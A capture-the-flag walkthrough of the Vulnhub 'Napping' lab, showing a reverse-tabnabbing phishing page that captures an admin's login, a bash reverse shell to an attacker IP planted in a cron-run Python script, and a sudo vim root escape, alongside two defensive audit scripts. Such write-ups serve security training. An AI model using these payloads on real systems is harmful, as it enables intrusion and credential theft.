Vulnhub lab -- NAPPING: 1.0.1

Environment setup

Target machine link

Attacker host IP: 192.168.47.145
Target host IP: 192.168.47.13
Information gathering

Scanning the target host shows that ports 22 and 80 are open.
```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 172.18.53.13
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-09 08:48 EST
Nmap scan report for 172.18.53.1
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 172.18.53.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
```
Web vulnerability hunting

Visiting port 80 on the target shows a login/registration page.

SQL injection, authentication-bypass payloads and weak credentials were tried here without success.

Next, brute-force directories to see whether other paths exist.
```
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://172.18.53.13/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.18.53.1/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,php,html,js,txt.bak,git,git.bak,txt,php.bak,html.bak,json,zip.bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/.html.bak            (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/register.php         (Status: 200) [Size: 1566]
/index.php            (Status: 200) [Size: 1219]
/welcome.php          (Status: 302) [Size: 0] [--> index.php]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 0]
/.html.bak            (Status: 403) [Size: 276]
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
```
Visiting config.php returns a blank page. Guessing that it might expect parameters, I fuzzed it with ffuf, without success.
So go back to the earlier page, register an account and log in.

After logging in, the site turns out to be a blog-promotion service: you can submit a blog link for free promotion, and every submitted link is reviewed by the admin user.

After submitting a link, clicking Here opens the link we submitted.
After checking some walkthroughs, it turns out this is a tabnabbing vulnerability.

Use F12 to change the URL behind Here and see whether the page follows it. If whatever site you enter is the site the page navigates to, tabnabbing is possible.
Tabnabbing attack: a legitimate site A has an <a> tag that points at a malicious site B; B uses window.opener to modify the original page A, silently replacing the legitimate page A that the user was visiting with a phishing page C. Two conditions make this possible:

1. An <a> tag with target=_blank that does not set rel="noopener" or rel="noreferrer"
2. Use of window.open
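The first condition is something a reviewer can check mechanically. The following Python script is an added example, not code from the original writeup or from the lab; it scans server-rendered HTML for anchors that open a new tab without severing window.opener, and shows how a reviewed-links page should emit such a link. The sample markup and the URL in it are constructed for the demonstration and are not the lab's real page source.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample (hypothetical markup): the "Here" link a blog-promotion
# page might render for a user-submitted URL, in unsafe and hardened forms.
SAMPLE_HTML = """
<p>Your link: <a href="http://blog.example/post" target="_blank">Here</a></p>
<p>Hardened: <a href="http://blog.example/post" target="_blank" rel="noopener noreferrer">Here</a></p>
<p>Same tab: <a href="/welcome.php">Back</a></p>
"""


class BlankTargetAuditor(HTMLParser):
    """Collects anchors that open a new tab without severing window.opener."""

    def __init__(self):
        super().__init__()
        self.unsafe = []  # target=_blank and no noopener/noreferrer in rel
        self.safe = []    # target=_blank with a protective rel token

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attr = {name.lower(): (value or "") for name, value in attrs}
        if attr.get("target", "").lower() != "_blank":
            return  # same-tab links never hand the new page a window.opener
        # rel is a space-separated token list; noreferrer implies noopener.
        rel_tokens = set(attr.get("rel", "").lower().split())
        if rel_tokens & {"noopener", "noreferrer"}:
            self.safe.append(attr.get("href", ""))
        else:
            self.unsafe.append(attr.get("href", ""))


def audit_blank_targets(html):
    """Return (unsafe_hrefs, safe_hrefs) for every target=_blank anchor."""
    parser = BlankTargetAuditor()
    parser.feed(html)
    parser.close()
    return parser.unsafe, parser.safe


def harden_anchor(href, text):
    """Render a new-tab link the way a links-review page should emit it:
    the href is attribute-escaped and rel severs the opener relationship."""
    return (f'<a href="{escape(href, quote=True)}" target="_blank" '
            f'rel="noopener noreferrer">{escape(text)}</a>')


if __name__ == "__main__":
    unsafe, safe = audit_blank_targets(SAMPLE_HTML)
    print("unsafe:", unsafe)
    print("safe:", safe)
    print(harden_anchor("http://blog.example/post", "Here"))
```

Current browsers treat target=_blank as noopener by default, but the explicit rel attribute is still the portable fix, and it is what a template review should look for; the audit above flags exactly the anchors that lack it.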
After clicking, the page did navigate to the modified URL.

Next, create two pages: a malicious page B and a fake login page C.

Malicious page B.html:
```html
<!DOCTYPE html>
<html>
<body>
<script>
  // window.opener is the window that opened this page; if it exists and is not
  // this window itself, navigate it (the main window) to the fake login page C.
  if (window.opener && window.opener !== window) {
    window.opener.location.replace('http://172.18.53.145:8888/C.html');
  }
</script>
</body>
</html>
```
Code explanation:

1. The window.opener property refers to the window object that opened the current window; if the current window was not opened by another window, its value is null.
2. if(window.opener) checks whether window.opener exists; if it does, the current window was opened by another window, i.e. it was opened from within another page.
3. The main window is the window that opened the current one; it is reached through window.opener.
4. location.replace changes the main window's address to a new URL, which amounts to redirecting the main window.
5. Setting the main window's location to 'http://172.18.53.145:8888/login.html' redirects the main window to this new login page.
Fake login page C.html, which simply copies the source of the legitimate login page:
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>Login</h2>
        <p>Please fill in your credentials to login.</p>
        <form action="/index.php" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control " value="">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control ">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>
```
On the attacker machine, start an HTTP server with Python and listen on local port 8888 with nc.
```
┌──(kali㉿kali)-[~/tools/download]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
```
Then submit page B as the blog link to be promoted. This effectively embeds the malicious link in the legitimate page: when the admin user clicks the link to review it, the original page is redirected to our fake login page, and when the admin logs in there, the attacker receives the admin's username and password.
```
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 49584
POST /login.html HTTP/1.1
Host: 172.18.53.145:8888
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123
```
This gives us the account daniel with password C@ughtm3napping123. Recalling that the port scan also showed port 22 open, use these credentials to log in over SSH.
```
┌──(kali㉿kali)-[~]
└─$ ssh daniel@172.18.53.13
The authenticity of host '172.18.53.13 (172.18.53.13)' can't be established.
ED25519 key fingerprint is SHA256:81h22zyEZ6ztpKfLu65kzPnsnUUotkuioRYPno8fpN8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.53.13' (ED25519) to the list of known hosts.
daniel@172.18.53.13's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Nov 10 06:49:58 UTC 2023

  System load:             0.02
  Usage of /:              44.0% of 18.57GB
  Memory usage:            10%
  Swap usage:              0%
  Processes:               149
  Users logged in:         0
  IPv4 address for enp0s3: 172.18.53.13
  IPv6 address for enp0s3: 2001:250:6406:2053:a00:27ff:fe49:ee4d

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$
```
Privilege escalation

After logging in, gather basic information about the target host.

(1) We have the current user's password, so first check the user's sudo rights: the user has none.
```
daniel@napping:~$ sudo -l
[sudo] password for daniel:
Sorry, user daniel may not run sudo on napping.
```
(2) Look for suspicious users or groups

Check the current user and its groups: the user belongs to a group named administrators.
```
daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
```
Check /etc/passwd for notable users: there are the users adrian and daniel, which ls /home also shows.
```
daniel@napping:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
daniel:x:1001:1001::/home/daniel:/bin/bash
```
(3) Check the kernel version and network configuration
```
daniel@napping:~$ uname -a
Linux napping 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
daniel@napping:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff
    inet 172.18.53.13/24 brd 172.18.53.255 scope global dynamic enp0s3
       valid_lft 4184sec preferred_lft 4184sec
    inet6 2001:250:6406:2053:a00:27ff:fe49:ee4d/64 scope global dynamic mngtmpaddr noprefixroute
       valid_lft 2591998sec preferred_lft 604798sec
    inet6 fe80::a00:27ff:fe49:ee4d/64 scope link
       valid_lft forever preferred_lft forever
```
(4) Check whether the web root contains sensitive information such as database credentials

A database username and password are found in config.php.
```
daniel@napping:~$ cd /var/www/html/
daniel@napping:/var/www/html$ ls -liah
total 44K
792043 drwxr-xr-x 2 root root 4.0K Oct 12  2021 .
792042 drwxr-xr-x 3 root root 4.0K Oct 11  2021 ..
792826 -rw-r--r-- 1 root root  486 Oct 11  2021 config.php
792827 -rw-r--r-- 1 root root 4.7K Oct 11  2021 index.php
792828 -rw-r--r-- 1 root root  223 Oct 11  2021 logout.php
792830 -rw-r--r-- 1 root root 5.2K Oct 11  2021 register.php
792829 -rw-r--r-- 1 root root 3.9K Oct 11  2021 reset-password.php
794398 -rw-r--r-- 1 root root 6.8K Oct 12  2021 welcome.php
daniel@napping:/var/www/html$ cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
```
(5) Check the users' home directories for suspicious files
```
daniel@napping:~$ ls /home/
adrian  daniel
daniel@napping:~$ ls -liah /home/adrian/
total 32K
791504 drwxr-xr-x 3 adrian adrian         4.0K Nov  9 13:48 .
262145 drwxr-xr-x 4 root   root           4.0K Oct 12  2021 ..
794373 lrwxrwxrwx 1 adrian adrian            9 Oct 12  2021 .bash_history -> /dev/null
791506 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .bash_logout
791507 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .bashrc
791524 drwx------ 2 adrian adrian         4.0K Oct 11  2021 .cache
794363 lrwxrwxrwx 1 adrian adrian            9 Oct 12  2021 .mysql_history -> /dev/null
791505 -rw-r--r-- 1 adrian adrian            0 Feb 25  2020 .profile
794359 -rw-rw-r-- 1 adrian adrian           75 Oct 11  2021 .selected_editor
791526 -rw-r--r-- 1 adrian adrian            0 Oct 11  2021 .sudo_as_admin_successful
792736 -rw------- 1 adrian adrian            0 Oct 30  2021 .viminfo
792740 -rw-rw-r-- 1 adrian administrators  481 Oct 30  2021 query.py
792383 -rw-rw-r-- 1 adrian adrian         5.9K Nov 10 07:08 site_status.txt
794392 -rw------- 1 adrian adrian           22 Oct 12  2021 user.txt
daniel@napping:~$ ls -liah /home/daniel/
total 24K
792831 drwxr-xr-x 3 daniel daniel 4.0K Oct 12  2021 .
262145 drwxr-xr-x 4 root   root   4.0K Oct 12  2021 ..
794391 lrwxrwxrwx 1 daniel daniel    9 Oct 12  2021 .bash_history -> /dev/null
794358 -rw-r--r-- 1 daniel daniel  220 Feb 25  2020 .bash_logout
794360 -rw-r--r-- 1 daniel daniel 3.7K Feb 25  2020 .bashrc
794361 drwx------ 2 daniel daniel 4.0K Oct 12  2021 .cache
794351 -rw-r--r-- 1 daniel daniel  807 Feb 25  2020 .profile
792825 -rw------- 1 daniel daniel    0 Oct 12  2021 .viminfo
```
There is nothing suspicious in daniel's home directory. In adrian's home directory, however, query.py is readable and writable by the administrators group, and the current user belongs to that group, so this file is a candidate for abuse. First, look at its contents.
```
daniel@napping:~$ cat /home/adrian/query.py
from datetime import datetime
import requests

now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
```
The script first requests the local website. If the request succeeds it appends "Site is Up" and the check time to site_status.txt; if it fails it appends "Check Out Site" and the check time.

Looking at site_status.txt, the site's status has been recorded every two minutes since the site started running.
```
daniel@napping:/home/adrian$ cat site_status.txt
Site is Up: 09/11/2023 13:48:03
Site is Up: 09/11/2023 13:50:01
Site is Up: 09/11/2023 13:52:02
Site is Up: 09/11/2023 13:54:01
Site is Up: 09/11/2023 13:56:01
Site is Up: 09/11/2023 13:58:01
Site is Up: 09/11/2023 14:00:02
Site is Up: 09/11/2023 14:02:01
Site is Up: 09/11/2023 14:04:02
Site is Up: 09/11/2023 14:06:02
Site is Up: 09/11/2023 14:08:02
Site is Up: 09/11/2023 14:10:01
Site is Up: 09/11/2023 14:12:01
Site is Up: 09/11/2023 14:14:01
Site is Up: 09/11/2023 14:16:02
```
Presumably a scheduled task (cron job) runs the script every two minutes.

Since the current user's group has permission to modify the script, the plan is to modify it to spawn a reverse shell and obtain adrian's privileges.
Create shell.sh in /tmp:
```
daniel@napping:/tmp$ cat shell.sh
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/172.18.53.145/4444 0>&1'
```
Modify query.py:
```
daniel@napping:/home/adrian$ cat query.py
from datetime import datetime
import requests
import os

os.system('/usr/bin/bash /tmp/shell.sh')

now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
```
After waiting two minutes, the reverse shell connects back.
```
┌──(kali㉿kali)-[~/tools/download]
└─$ nc -lvp 4444
listening on [any] 4444 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 35184
bash: cannot set terminal process group (3941): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$
```
Check the current user's sudo rights: this user can run vim as root without a password.
```
adrian@napping:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
```
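A sudo rule like this one is a configuration finding that can be caught before anyone needs to exploit it. The following Python script is an added example, not code from the writeup or from the lab; it parses the command section of `sudo -l` output and flags rules that grant an interactive editor or pager (or ALL) as root, since such programs can run subcommands from inside and therefore amount to a root shell. The sample output is constructed in the shape shown above, with a second, benign rule added for contrast.

```python
import os
import re
import shlex

# Constructed sample in the shape `sudo -l` prints (raw string, because sudo
# escapes the colons in secure_path with backslashes).
SAMPLE_SUDO_L = r"""Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart apache2
"""

# Interactive editors and pagers can launch subcommands from inside the
# program, so granting them through sudo is equivalent to granting a shell.
INTERACTIVE_TOOLS = {"vim", "vi", "view", "nvim", "nano", "less", "more"}

# One rule line: "(runas) [TAG: ...] command"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Parse the command section of `sudo -l` output into rule dicts with
    keys runas, nopasswd and command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue  # skip the Defaults block above the rule list
        match = RULE_RE.match(line)
        if not match:
            continue
        runas, tags, command = match.groups()
        rules.append({
            "runas": runas.strip(),
            "nopasswd": "NOPASSWD:" in tags,
            "command": command,
        })
    return rules


def risky_rules(rules):
    """Rules that hand out ALL or an interactive tool, i.e. effectively a
    shell as the run-as user."""
    flagged = []
    for rule in rules:
        if rule["command"] == "ALL":
            flagged.append(rule)
            continue
        program = os.path.basename(shlex.split(rule["command"])[0])
        if program in INTERACTIVE_TOOLS:
            flagged.append(rule)
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD " if rule["nopasswd"] else ""
        print(f"risky: ({rule['runas']}) {tag}{rule['command']}")
```

The remediation for the flagged rule is to grant `sudoedit` on the specific files that need editing instead of the editor binary itself: sudoedit copies the file, runs the editor as the invoking user, and only the final write happens with privileges.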
So use vim to escalate privileges:

```
sudo vim -c ':!/bin/sh'
```

Privilege escalation succeeded:

```
:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
```